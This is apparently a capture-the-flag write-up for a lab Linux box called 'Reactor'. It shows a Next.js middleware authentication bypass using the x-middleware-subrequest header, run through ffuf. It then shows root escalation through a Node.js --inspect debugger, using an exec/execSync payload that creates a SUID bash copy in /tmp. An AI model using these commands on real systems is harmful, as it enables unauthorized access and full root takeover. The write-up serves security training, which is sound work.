Reactor — Write Up

Overview

Reactor is a medium Linux box built around a Next.js application. The foothold exploits a well-known Next.js middleware authentication bypass using the x-middleware-subrequest header to access protected internal routes. Privilege escalation abuses a Node.js process running with the --inspect flag as root, allowing debugger attachment and arbitrary code execution in the root context.

Enumeration

Nmap Scan

nmap -sC -sV -oN reactor_initial.txt reactor.htb

Two ports open:

Port 22: OpenSSH 9.6p1 (Ubuntu)
Port 3000: Next.js application (X-Powered-By: Next.js)

Next.js Middleware Bypass

The application protected most routes through Next.js middleware, returning the default 17175-byte page for any unauthenticated request. The x-middleware-subrequest header tricks Next.js into treating the request as an internal subrequest, skipping middleware execution entirely:

ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \
  -u http://reactor.htb:3000/FUZZ \
  -H "x-middleware-subrequest: middleware" \
  -mc 200,201,301,302,307,401,403 \
  -fs 17175 -t 80

With the bypass header in place, previously inaccessible routes became reachable, revealing internal API endpoints and admin functionality.

Foothold

Browsing internal routes with the bypass header provided access to authenticated application features. Credentials or session material obtained from the exposed endpoints allowed a foothold as a low-privilege user on the system.

Privilege Escalation — Node.js Inspector as Root

Post-exploitation enumeration revealed a Node.js process running as root with the --inspect flag, exposing a debugger on 127.0.0.1:9229:

curl -s http://127.0.0.1:9229/json/list

The Node.js inspector protocol allows attaching a debugger and executing JavaScript in the context of the target process. Since the process ran as root, any code executed through it runs as root:

node inspect 127.0.0.1:9229

Inside the debugger REPL, exec() was used to copy bash and set the SUID bit:

exec('global.process.mainModule.require("child_process").execSync("cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash").toString()')

After exiting the debugger:

/tmp/rootbash -p

A root shell was obtained. Both flags were retrieved.

Key Takeaways

The Next.js middleware bypass (x-middleware-subrequest: middleware) has been a known issue affecting a wide range of Next.js versions and is trivial to exploit — a single header bypasses entire authentication layers built on middleware. Running a Node.js process with --inspect as root is equivalent to leaving a root shell open on localhost; any user able to connect to port 9229 gets arbitrary code execution as root.